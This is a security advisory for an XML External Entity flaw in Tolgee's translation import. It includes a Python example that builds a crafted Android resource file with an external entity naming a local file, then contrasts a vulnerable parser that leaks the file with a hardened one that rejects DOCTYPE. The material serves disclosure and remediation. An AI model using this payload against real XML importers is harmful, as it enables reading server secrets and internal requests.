Tolgee XML External Entity Injection Vulnerability in Translation Import

Vulnerability

An XML External Entity (XXE) injection vulnerability, rated critical, affects Tolgee, an open-source localization platform, prior to version 3.166.3. The XML parsers that import Android XML resource files and .NET .resx files do not disable external entity processing, so an entity declared in an uploaded file's DOCTYPE is resolved by the server during import. An authenticated user with permission to import translation files can therefore read arbitrary files that the Tolgee process can access and make server-side requests to internal services. The flaw has been confirmed to affect both self-hosted instances and the cloud platform at app.tolgee.io.

Impact

A crafted import file declares an external entity whose SYSTEM identifier names a local path or a URL, and the parser writes whatever it resolves into the imported translation. An attacker can use this to disclose files readable by the Tolgee process, such as application configuration containing database credentials, to read the server's environment variables, or to make the server issue requests to internal services or cloud metadata endpoints.

Reproduction

To reproduce, log in to a Tolgee project with import permission and upload a crafted Android XML resource file whose string value is an external entity pointing at a sensitive file, such as /etc/passwd. After the import completes, the translation stored for the imported key contains the referenced file's contents.

Remediation

Update to Tolgee version 3.166.3 or later, where the parsers were fixed. Operators of self-hosted instances should also verify that every XML parser that handles uploaded files disables external general and parameter entities and rejects DOCTYPE declarations outright, since imported resource files never legitimately need a DTD.
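The reproduction and the remediation above, worked through in code. This is an added example for this advisory, not Tolgee's own code (the Tolgee importer is Kotlin/Java): it re-creates the bug class with Python's stdlib expat-backed SAX parser, whose feature_external_ges switch stands in for the external-entity features the advisory says were left enabled. The Android resource payload, the StringsHandler/DoctypeRejector classes and the fake /etc/passwd contents are all constructed for the example; only the mechanism (a SYSTEM entity resolved at import time and copied into the translation) is what the advisory describes.

```python
"""XXE through a translation import: vulnerable vs hardened parser setup.

Added example, not Tolgee code. feature_external_ges plays the role of the
external-entity features the advisory says were left enabled in the importer.
"""
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


def build_android_xxe(file_uri: str) -> str:
    """Crafted Android string resource: the string's only content is an
    external entity whose SYSTEM identifier names a file on the server."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE resources [\n'
        f'  <!ENTITY xxe SYSTEM "{file_uri}">\n'
        ']>\n'
        '<resources>\n'
        '  <string name="app_name">&xxe;</string>\n'
        '</resources>\n'
    )


BENIGN_ANDROID = (  # constructed, well-formed import with no DTD at all
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<resources>\n'
    '  <string name="app_name">My App</string>\n'
    '</resources>\n'
)


class StringsHandler(ContentHandler):
    """Collects <string name="...">text</string> into {key: translation}."""

    def __init__(self):
        super().__init__()
        self.strings = {}
        self._key = None
        self._buf = []

    def startElement(self, name, attrs):
        if name == "string":
            self._key = attrs.get("name")
            self._buf = []

    def characters(self, content):
        if self._key is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "string" and self._key is not None:
            self.strings[self._key] = "".join(self._buf)
            self._key = None


class DoctypeRejector:
    """SAX lexical handler: an uploaded resource file never needs a DTD, so
    the hardened importer refuses the document as soon as one is declared."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE declarations are not allowed in imported XML")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def import_android_strings(xml_text: str, hardened: bool) -> dict:
    """hardened=False resolves external general entities (the vulnerable
    configuration); hardened=True leaves them unresolved and rejects DOCTYPE."""
    handler = StringsHandler()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    if hardened:
        parser.setFeature(feature_external_ges, False)
        parser.setProperty(property_lexical_handler, DoctypeRejector())
    else:
        parser.setFeature(feature_external_ges, True)
    parser.parse(io.StringIO(xml_text))
    return handler.strings


def demo() -> dict:
    """Stand-in for the advisory's repro: a constructed fake /etc/passwd goes
    into a temp file and the crafted import runs through both parser setups."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "passwd"
        secret.write_text("root:x:0:0:root:/root:/bin/sh")  # constructed content
        payload = build_android_xxe(secret.resolve().as_uri())
        leaked = import_android_strings(payload, hardened=False)["app_name"]
        try:
            import_android_strings(payload, hardened=True)
            blocked = None
        except ValueError as err:
            blocked = str(err)
    return {
        "vulnerable": leaked,         # file contents end up in the translation
        "hardened_error": blocked,    # import refused before any entity resolves
        "benign": import_android_strings(BENIGN_ANDROID, hardened=True),
    }


if __name__ == "__main__":
    print(demo())
```

Running the block prints the fake passwd line as the value of app_name for the vulnerable parser, the rejection message for the hardened one, and the untouched benign import. The same two controls are what the fix has to establish in a JAXP-based importer: setting the Xerces feature http://apache.org/xml/features/disallow-doctype-decl to true on the DocumentBuilderFactory or SAXParserFactory, and disabling external general and parameter entities as defence in depth.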

Added: Mar 12, 2026, 8:18 PM
Updated: Mar 12, 2026, 8:18 PM

Vulnerability Rating

Custom Algorithm

spread: 0.8
impact: 0.6
exploitability: 6.6
remediation: 7.7
relevance: 4.2
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.